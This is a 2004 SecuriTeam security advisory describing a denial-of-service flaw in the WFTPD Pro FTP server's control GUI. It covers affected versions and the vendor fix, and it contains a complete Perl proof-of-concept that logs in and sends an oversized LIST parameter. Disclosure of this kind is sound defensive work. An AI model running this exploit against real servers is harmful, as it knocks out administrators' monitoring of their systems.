[NT] WFTPD GUI DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 03/17/04

  • Next message: SecuriTeam: "[NT] GlobalSCAPE Secure FTP Server Buffer Overflow (Parameter Handling)"
    To: list@securiteam.com
    Date: 17 Mar 2004 18:18:58 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      WFTPD GUI DoS
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in WFTPD Pro allows a user issuing a long parameter
    (around 300 bytes) as a value for almost all commands, to cause a DoS
    attack against the controlling GUI of the WFTP Pro product. Once the
    attack has been launched, an administrator can no longer open the GUI and
    see the current connected users.

    DETAILS

    Vulnerable Systems:
     * WFTPD version 3.21 Release 2
     * WFTPD version 3.21 Release 1

    Immune Systems:
     * WFTPD version 3.21 Release 3

    Vendor Status:
    WFTPD Pro 3.21 Release 3 is released on March 16, 2004, to fix a potential
    denial-of-service attack on the Control Panel applet discovered by STORM
    <storm[at]securiteam[dot]com>. Also changed in this version - the output
    to the control panel applet is changed to being sent only when a command
    executes.

    Exploit:
    #!/usr/bin/perl
    # Multiple Vulnerabilities in WFTPD FTP Server version 3.21.1
    # Created by Beyond Security Ltd. - All rights reserved.

    use IO::Socket;

    $host = "192.168.1.243";

    $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
    PeerPort => "2119");

    unless ($remote) { die "cannot connect to ftp daemon on $host" }

    print "connected\n";
    while (<$remote>)
    {
     print $_;
     if (/220 /)
     {
      last;
     }
    }

    $remote->autoflush(1);

    my $ftp = "USER username\r\n";

    print $remote $ftp;
    print $ftp;
    sleep(1);

    while (<$remote>)
    {
     print $_;
     if (/331 /)
     {
      last;
     }
    }

    $ftp = join("", "PASS ", "password", "\r\n");
    print $remote $ftp;
    print $ftp;
    sleep(1);

    while (<$remote>)
    {
     print $_;
     if (/230 /)
     {
      last;
     }
    }

    $ftp = join ("", "LIST ", "A"x260, "\r\n"); # DoS ...

    print $remote $ftp;
    print $ftp;
    sleep(1);

    while (<$remote>)
    {
     print $_;
     if (/250 Done/)
     {
      last;
     }
    }

    close $remote;

    ADDITIONAL INFORMATION

    SecurITeam would like to thank <mailto:storm@securiteam.com> STORM for
    finding this vulnerability.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] GlobalSCAPE Secure FTP Server Buffer Overflow (Parameter Handling)"